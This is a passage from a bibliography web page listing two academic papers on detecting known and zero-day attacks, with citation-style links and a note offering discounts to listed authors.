Marbukh, Vladimir. "Towards Security Metrics Combining Risks of Known and Zero-day Attacks: Work in Progress." In NOMS 2023-2023 IEEE/IFIP Network Operations and Management Symposium. IEEE, 2023. http://dx.doi.org/10.1109/noms56928.2023.10154439.

Full text
APA, Harvard, Vancouver, ISO, and other styles
10

Holm, Hannes. "Signature Based Intrusion Detection for Zero-Day Attacks: (Not) A Closed Chapter?" In 2014 47th Hawaii International Conference on System Sciences (HICSS). IEEE, 2014. http://dx.doi.org/10.1109/hicss.2014.600.

Full text
APA, Harvard, Vancouver, ISO, and other styles
You might also be interested in the extended bibliographies on the topic 'Known and Zero-Day Attacks Detection' for particular source types:
Journal articles
We offer discounts on all premium plans for authors whose works are included in thematic literature selections. Contact us to get a unique promo code!

To the bibliography